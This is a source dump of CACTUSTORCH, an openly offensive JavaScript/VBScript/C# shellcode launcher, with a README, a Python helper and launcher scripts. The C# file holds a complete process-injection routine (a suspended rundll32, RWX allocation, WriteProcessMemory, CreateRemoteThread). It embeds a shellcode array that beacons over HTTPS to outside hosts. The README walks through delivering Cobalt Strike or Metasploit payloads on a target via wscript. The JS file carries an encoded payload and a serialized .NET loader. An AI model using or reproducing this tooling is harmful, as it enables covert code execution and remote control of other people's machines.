├── banner.txt ├── splitvba.py ├── README.md ├── CACTUSTORCH.cs └── TestClass.cs ├── CACTUSTORCH.xsl ├── CACTUSTORCH.js ├── CACTUSTORCH.jse ├── CACTUSTORCH.sct ├── CACTUSTORCH.vbe ├── CACTUSTORCH.vbs ├── CACTUSTORCH.hta └── CACTUSTORCH.vba /banner.txt: -------------------------------------------------------------------------------- 1 | ███████╗██████╗ ██╗ ██╗████████╗██╗ ██╗██████╗ █████╗ 2 | ██╔════╝██╔══██╗██║ ██║╚══██╔══╝██║ ██║██╔══██╗██╔══██╗ 3 | ███████╗██████╔╝██║ ██║ ██║ ██║ ██║██████╔╝███████║ 4 | ╚════██║██╔═══╝ ██║ ██║ ██║ ╚██╗ ██╔╝██╔══██╗██╔══██║ 5 | ███████║██║ ███████╗██║ ██║ ╚████╔╝ ██████╔╝██║ ██║ 6 | ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝ 7 | -------------------------------------------------------------------------------- /splitvba.py: -------------------------------------------------------------------------------- 1 | import os; 2 | import random; 3 | import uuid; 4 | import string; 5 | import sys; 6 | import argparse; 7 | 8 | def banner(): 9 | with open('banner.txt', 'r') as f: 10 | data = f.read() 11 | 12 | print "\033[1;31m%s\033[0;0m" % data 13 | print "\033[1;34mSplits base64 encoded payload into chunks for VBA" 14 | print "\033[1;32mAuthor: Vincent Yiu (@vysec, @vysecurity)\033[0;0m" 15 | 16 | def split_len(seq, length): 17 | return [seq[i:i+length] for i in range(0, len(seq), length)] 18 | 19 | if __name__ == '__main__': 20 | banner() 21 | if ((len(sys.argv) > 3) or len(sys.argv) < 3): 22 | # must be not 1 23 | print "Usage: " + sys.argv[0] + " " 24 | sys.exit(1) 25 | 26 | print "[*] Input file: " + sys.argv[1] 27 | 28 | f = open(sys.argv[1], 'r') 29 | code = f.read() 30 | f.close() 31 | 32 | # split into 100 char blocks 33 | output = split_len(code, 100) 34 | 35 | print "[*] Output file: " + sys.argv[2] 36 | f = open(sys.argv[2], 'w+') 37 | for a in output: 38 | f.write("code = code & \"" + a + "\"\r\n") 39 | f.close() 40 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | ``` 12 | 13 | Author and Credits 14 | ================== 15 | Author: Vincent Yiu (@vysecurity) 16 | 17 | Credits: 18 | - @cn33liz: Inspiration with StarFighters 19 | - @tiraniddo: James Forshaw for DotNet2JScript 20 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 21 | - @_RastaMouse: Testing and giving recommendations around README 22 | - @bspence7337: Testing 23 | 24 | Description 25 | =========== 26 | 27 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 28 | 29 | DotNetToJScript can be found here: https://github.com/tyranid/DotNetToJScript 30 | 31 | Usage: 32 | ====== 33 | 34 | * Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 35 | * Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 36 | * Run: cat payload.bin | base64 -w 0 37 | * For JavaScript: Copy the base64 encoded payload into the code variable below 38 | 39 | ```var code = "";``` 40 | 41 | * For VBScript: Copy the base64 encoded payload into the code variable below 42 | 43 | ```Dim code: code = ""``` 44 | * Then run: 45 | 46 | ```wscript.exe CACTUSTORCH.js``` or ```wscript.exe CACTUSTORCH.vbs``` via command line on the target, or double click on the files within Explorer. 47 | 48 | * For VBA: Copy the base64 encoded payload into a file such as code.txt 49 | 50 | * Run python splitvba.py code.txt output.txt 51 | 52 | * Copy output.txt under the following bit so it looks like: 53 | 54 | ``` 55 | code = "" 56 | code = code & " Host CACTUSTORCH Payload 71 | * Fill in fields 72 | * File hosted and ready to go! 73 | -------------------------------------------------------------------------------- /CACTUSTORCH.cs/TestClass.cs: -------------------------------------------------------------------------------- 1 | // This file is part of DotNetToJScript. 2 | // Copyright (C) James Forshaw 2017 3 | // 4 | // DotNetToJScript is free software: you can redistribute it and/or modify 5 | // it under the terms of the GNU General Public License as published by 6 | // the Free Software Foundation, either version 3 of the License, or 7 | // (at your option) any later version. 8 | // 9 | // DotNetToJScript is distributed in the hope that it will be useful, 10 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | // GNU General Public License for more details. 13 | // 14 | // You should have received a copy of the GNU General Public License 15 | // along with DotNetToJScript. If not, see . 16 | 17 | using System.Diagnostics; 18 | using System.Runtime.InteropServices; 19 | using System.Windows.Forms; 20 | using System; 21 | using System.Text; 22 | 23 | [ComVisible(true)] 24 | public class cactusTorch 25 | { 26 | 27 | [StructLayout(LayoutKind.Sequential)] 28 | public class SecurityAttributes 29 | { 30 | public Int32 Length = 0; 31 | public IntPtr lpSecurityDescriptor = IntPtr.Zero; 32 | public bool bInheritHandle = false; 33 | 34 | public SecurityAttributes() 35 | { 36 | this.Length = Marshal.SizeOf(this); 37 | } 38 | } 39 | 40 | [StructLayout(LayoutKind.Sequential)] 41 | public struct ProcessInformation 42 | { 43 | public IntPtr hProcess; 44 | public IntPtr hThread; 45 | public Int32 dwProcessId; 46 | public Int32 dwThreadId; 47 | } 48 | 49 | [Flags] 50 | public enum CreateProcessFlags : uint 51 | { 52 | DEBUG_PROCESS = 0x00000001, 53 | DEBUG_ONLY_THIS_PROCESS = 0x00000002, 54 | CREATE_SUSPENDED = 0x00000004, 55 | DETACHED_PROCESS = 0x00000008, 56 | CREATE_NEW_CONSOLE = 0x00000010, 57 | NORMAL_PRIORITY_CLASS = 0x00000020, 58 | IDLE_PRIORITY_CLASS = 0x00000040, 59 | HIGH_PRIORITY_CLASS = 0x00000080, 60 | REALTIME_PRIORITY_CLASS = 0x00000100, 61 | CREATE_NEW_PROCESS_GROUP = 0x00000200, 62 | CREATE_UNICODE_ENVIRONMENT = 0x00000400, 63 | CREATE_SEPARATE_WOW_VDM = 0x00000800, 64 | CREATE_SHARED_WOW_VDM = 0x00001000, 65 | CREATE_FORCEDOS = 0x00002000, 66 | BELOW_NORMAL_PRIORITY_CLASS = 0x00004000, 67 | ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000, 68 | INHERIT_PARENT_AFFINITY = 0x00010000, 69 | INHERIT_CALLER_PRIORITY = 0x00020000, 70 | CREATE_PROTECTED_PROCESS = 0x00040000, 71 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000, 72 | PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000, 73 | PROCESS_MODE_BACKGROUND_END = 0x00200000, 74 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000, 75 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, 76 | CREATE_DEFAULT_ERROR_MODE = 0x04000000, 77 | CREATE_NO_WINDOW = 0x08000000, 78 | PROFILE_USER = 0x10000000, 79 | PROFILE_KERNEL = 0x20000000, 80 | PROFILE_SERVER = 0x40000000, 81 | CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000, 82 | } 83 | 84 | [Flags] 85 | public enum DuplicateOptions : uint 86 | { 87 | DUPLICATE_CLOSE_SOURCE = 0x00000001, 88 | DUPLICATE_SAME_ACCESS = 0x00000002 89 | } 90 | 91 | [StructLayout(LayoutKind.Sequential)] 92 | public class StartupInfo 93 | { 94 | public Int32 cb = 0; 95 | public IntPtr lpReserved = IntPtr.Zero; 96 | public IntPtr lpDesktop = IntPtr.Zero; // MUST be Zero 97 | public IntPtr lpTitle = IntPtr.Zero; 98 | public Int32 dwX = 0; 99 | public Int32 dwY = 0; 100 | public Int32 dwXSize = 0; 101 | public Int32 dwYSize = 0; 102 | public Int32 dwXCountChars = 0; 103 | public Int32 dwYCountChars = 0; 104 | public Int32 dwFillAttribute = 0; 105 | public Int32 dwFlags = 0; 106 | public Int16 wShowWindow = 0; 107 | public Int16 cbReserved2 = 0; 108 | public IntPtr lpReserved2 = IntPtr.Zero; 109 | public IntPtr hStdInput = IntPtr.Zero; 110 | public IntPtr hStdOutput = IntPtr.Zero; 111 | public IntPtr hStdError = IntPtr.Zero; 112 | 113 | public StartupInfo() 114 | { 115 | this.cb = Marshal.SizeOf(this); 116 | } 117 | } 118 | 119 | [Flags()] 120 | public enum AllocationType : uint 121 | { 122 | COMMIT = 0x1000, 123 | RESERVE = 0x2000, 124 | GO = 0x3000, 125 | RESET = 0x80000, 126 | LARGE_PAGES = 0x20000000, 127 | PHYSICAL = 0x400000, 128 | TOP_DOWN = 0x100000, 129 | WRITE_WATCH = 0x200000 130 | } 131 | 132 | 133 | [Flags()] 134 | public enum MemoryProtection : uint 135 | { 136 | EXECUTE = 0x10, 137 | EXECUTE_READ = 0x20, 138 | EXECUTE_READWRITE = 0x40, 139 | EXECUTE_WRITECOPY = 0x80, 140 | NOACCESS = 0x01, 141 | READONLY = 0x02, 142 | READWRITE = 0x04, 143 | WRITECOPY = 0x08, 144 | GUARD_Modifierflag = 0x100, 145 | NOCACHE_Modifierflag = 0x200, 146 | WRITECOMBINE_Modifierflag = 0x400 147 | } 148 | 149 | // CreateProcessA 150 | [DllImport("kernel32.dll")] 151 | public static extern IntPtr CreateProcessA( 152 | String lpApplicationName, 153 | String lpCommandLine, 154 | SecurityAttributes lpProcessAttributes, 155 | SecurityAttributes lpThreadAttributes, 156 | Boolean bInheritHandles, 157 | CreateProcessFlags dwCreationFlags, 158 | IntPtr lpEnvironment, 159 | String lpCurrentDirectory, 160 | [In] StartupInfo lpStartupInfo, 161 | out ProcessInformation lpProcessInformation 162 | 163 | ); 164 | 165 | // VirtualAllocEx 166 | [DllImport("kernel32.dll")] 167 | public static extern IntPtr VirtualAllocEx( 168 | IntPtr lpHandle, 169 | IntPtr lpAddress, 170 | IntPtr dwSize, 171 | AllocationType flAllocationType, 172 | MemoryProtection flProtect 173 | ); 174 | 175 | // WriteProcessMemory 176 | [DllImport("kernel32.dll")] 177 | public static extern bool WriteProcessMemory( 178 | IntPtr hProcess, 179 | IntPtr lpBaseAddress, 180 | byte[] buffer, 181 | IntPtr dwSize, 182 | int lpNumberOfBytesWritten); 183 | 184 | // TerminateProcess 185 | 186 | [DllImport("kernel32.dll")] 187 | public static extern bool TerminateProcess( 188 | IntPtr hProcess, 189 | uint uExitCode); 190 | 191 | // CreateRemoteThread 192 | [DllImport("kernel32.dll")] 193 | static extern IntPtr CreateRemoteThread( 194 | IntPtr hProcess, 195 | IntPtr lpThreadAttributes, 196 | uint dwStackSize, 197 | IntPtr lpStartAddress, 198 | IntPtr lpParameter, 199 | uint dwCreationFlags, 200 | IntPtr lpThreadId); 201 | 202 | public cactusTorch() 203 | { 204 | MessageBox.Show("Test", "Test", MessageBoxButtons.OK, MessageBoxIcon.Exclamation); 205 | flame("rundll32.exe", "blab"); 206 | } 207 | 208 | public void flame(string binary, string shellcode32) 209 | { 210 | // Written by Vincent Yiu (@vysecurity) 211 | 212 | // shellcode contains base64 shellcode 213 | // binary contains binary to inject into 214 | 215 | //byte[] sc = Convert.FromBase64String(shellcode32); 216 | byte[] sc = new byte[841] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0xbb, 0x01, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0x50, 0xe9, 0x8c, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x32, 0xa0, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x68, 0x80, 0x33, 0x00, 0x00, 0x89, 0xe0, 0x6a, 0x04, 0x50, 0x6a, 0x1f, 0x56, 0x68, 0x75, 0x46, 0x9e, 0x86, 0xff, 0xd5, 0x5f, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xca, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x75, 0x07, 0x58, 0x50, 0xe9, 0x7b, 0xff, 0xff, 0xff, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x6f, 0xff, 0xff, 0xff, 0x2f, 0x5f, 0x69, 0x6e, 0x69, 0x74, 0x2e, 0x67, 0x69, 0x66, 0x3f, 0x75, 0x74, 0x6d, 0x63, 0x6e, 0x3d, 0x31, 0x26, 0x75, 0x74, 0x6d, 0x63, 0x73, 0x3d, 0x49, 0x53, 0x4f, 0x2d, 0x38, 0x38, 0x39, 0x39, 0x2d, 0x31, 0x26, 0x75, 0x74, 0x6d, 0x73, 0x72, 0x3d, 0x31, 0x32, 0x38, 0x30, 0x78, 0x31, 0x30, 0x32, 0x34, 0x26, 0x75, 0x74, 0x6d, 0x73, 0x63, 0x3d, 0x33, 0x32, 0x2d, 0x62, 0x69, 0x74, 0x26, 0x75, 0x74, 0x6d, 0x75, 0x6c, 0x3d, 0x65, 0x6e, 0x2d, 0x55, 0x53, 0x00, 0xb9, 0x90, 0x00, 0x48, 0x6f, 0x73, 0x74, 0x3a, 0x20, 0x64, 0x32, 0x6e, 0x78, 0x79, 0x34, 0x6a, 0x67, 0x62, 0x71, 0x63, 0x75, 0x6a, 0x6d, 0x2e, 0x63, 0x6c, 0x6f, 0x75, 0x64, 0x66, 0x72, 0x6f, 0x6e, 0x74, 0x2e, 0x6e, 0x65, 0x74, 0x0d, 0x0a, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x39, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x30, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x35, 0x2e, 0x30, 0x3b, 0x20, 0x42, 0x4f, 0x31, 0x49, 0x45, 0x38, 0x5f, 0x76, 0x31, 0x3b, 0x45, 0x4e, 0x55, 0x53, 0x29, 0x0d, 0x0a, 0x00, 0x43, 0x60, 0xcd, 0x0a, 0xe7, 0x58, 0x40, 0x49, 0x30, 0x40, 0x89, 0xa6, 0x41, 0x3d, 0x82, 0x02, 0x9d, 0x32, 0xe1, 0x97, 0xa6, 0x9d, 0xb1, 0xbe, 0x32, 0x62, 0x34, 0x5f, 0xaf, 0xf8, 0x62, 0x64, 0x9e, 0x64, 0xc6, 0x2d, 0xe3, 0x5d, 0xb7, 0xde, 0x73, 0x6f, 0x92, 0x71, 0x0c, 0x41, 0x49, 0x15, 0x42, 0xab, 0x62, 0x11, 0x42, 0xf9, 0x0e, 0xda, 0x3d, 0x99, 0xb0, 0x3d, 0xb3, 0xf3, 0x0a, 0x3f, 0x5d, 0x90, 0x0f, 0xda, 0xd5, 0xc5, 0x43, 0x21, 0xec, 0x97, 0x2a, 0xb8, 0x42, 0x5d, 0xbc, 0x54, 0x4b, 0x0d, 0xe5, 0x3a, 0xc0, 0x48, 0x9f, 0x88, 0x96, 0xc4, 0x10, 0xe4, 0xa6, 0x4a, 0xa6, 0x66, 0x7d, 0xe5, 0x5f, 0xe5, 0xb8, 0x67, 0xf8, 0xbc, 0x94, 0x8f, 0xa3, 0xee, 0x52, 0xf3, 0x65, 0xa1, 0x15, 0x63, 0x35, 0xdd, 0x4b, 0xbb, 0x72, 0xd1, 0xa3, 0xdc, 0xfc, 0x47, 0xdd, 0xec, 0xe4, 0x14, 0x1e, 0x50, 0x0e, 0x79, 0x74, 0x2e, 0xb1, 0x7f, 0xe5, 0xe9, 0x27, 0x21, 0xc4, 0xee, 0x3b, 0x2b, 0x60, 0xc0, 0x17, 0x99, 0x06, 0x71, 0x3e, 0x2d, 0x8d, 0x8f, 0xe5, 0x69, 0xd8, 0x6d, 0x3f, 0x4a, 0x9b, 0x2a, 0x53, 0xc9, 0xb6, 0x97, 0x55, 0x26, 0xdd, 0xc8, 0x12, 0xd8, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x28, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0x89, 0xfd, 0xff, 0xff, 0x63, 0x64, 0x6e, 0x2e, 0x63, 0x6f, 0x69, 0x6e, 0x72, 0x61, 0x6e, 0x6b, 0x69, 0x6e, 0x67, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x73, 0x7f, 0xb7, 0xcc }; 217 | IntPtr size = new IntPtr(sc.Length); 218 | StartupInfo sInfo = new StartupInfo(); 219 | sInfo.dwFlags = 0; 220 | ProcessInformation pInfo; 221 | string binaryPath = ""; 222 | // We check what architecture OS it is here 223 | 224 | if (Environment.GetEnvironmentVariable("ProgramW6432").Length > 0) 225 | { 226 | //64 bit 227 | binaryPath = Environment.GetEnvironmentVariable("windir") + "\\SysWOW64\\" + binary; 228 | } 229 | else 230 | { 231 | //32 bit 232 | binaryPath = Environment.GetEnvironmentVariable("windir") + "\\System32\\" + binary; 233 | } 234 | 235 | // We have select the correct directory, for the executeable 236 | 237 | // Create the Process in SUSPENDED state 238 | IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo); 239 | IntPtr hProcess = pInfo.hProcess; 240 | if (hProcess.ToString() != IntPtr.Zero) { 241 | //MessageBox.Show("hProcess: " + hProcess.ToString("X8")); 242 | // Use VirtualAllocEx to create some space 243 | 244 | IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, AllocationType.GO, MemoryProtection.EXECUTE_READWRITE); 245 | 246 | //MessageBox.Show("Virtual Alloc: " + spaceAddr.ToString("X8")); 247 | 248 | if (spaceAddr.ToString() == IntPtr.Zero) 249 | { 250 | // TerminateProcess incase failed to Valloc for some reason. 251 | TerminateProcess(hProcess, 0); 252 | } 253 | else 254 | { 255 | // Use WriteProcessMemory to WRITE "POKEMON" in 256 | int test = 0; 257 | 258 | IntPtr size2 = new IntPtr(sc.Length); 259 | bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test); 260 | 261 | //MessageBox.Show("WriteProcessMemory: " + bWrite.ToString()); 262 | 263 | // CreateRemoteThread to start it up 264 | CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0)); 265 | 266 | } 267 | } 268 | 269 | 270 | //Process.Start(shellcode); 271 | } 272 | } 273 | 274 | -------------------------------------------------------------------------------- /CACTUSTORCH.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 232 | 233 | -------------------------------------------------------------------------------- /CACTUSTORCH.js: -------------------------------------------------------------------------------- 1 | /* 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | Author: Vincent Yiu (@vysecurity) 12 | Credits: 13 | - @cn33liz: Inspiration with StarFighter 14 | - @ttiraniddo: James Forshaw for DotNet2JScript 15 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 16 | 17 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 18 | 19 | Usage: 20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | Run: cat payload.bin | base64 -w 0 23 | Copy the base64 encoded payload into the code variable below. 24 | 25 | */ 26 | 27 | // Replace binary with a executable in both SYSTEM32 and SYSWOW64 that you want to use as container. eg. notepad.exe, calc.exe 28 | var binary = "rundll32.exe"; 29 | 30 | // Replace code with base64 encoded 32 bit shellcode 31 | var code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA"; 32 | 33 | 34 | // ------------ DO NOT EDIT BELOW HERE -------------- 35 | 36 | function setversion() { 37 | var shell = new ActiveXObject('WScript.Shell'); 38 | ver = 'v4.0.30319'; 39 | try { 40 | shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\'); 41 | } catch(e) { 42 | ver = 'v2.0.50727'; 43 | } 44 | shell.Environment('Process')('COMPLUS_Version') = ver; 45 | 46 | } 47 | function debug(s) {} 48 | function base64ToStream(b) { 49 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 50 | var length = enc.GetByteCount_2(b); 51 | var ba = enc.GetBytes_4(b); 52 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 53 | ba = transform.TransformFinalBlock(ba, 0, length); 54 | var ms = new ActiveXObject("System.IO.MemoryStream"); 55 | ms.Write(ba, 0, (length / 4) * 3); 56 | ms.Position = 0; 57 | return ms; 58 | } 59 | 60 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 61 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 62 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 63 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 64 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 65 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 66 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 67 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 68 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 69 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 70 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 71 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 72 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 73 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 74 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 75 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 76 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 77 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 78 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 79 | 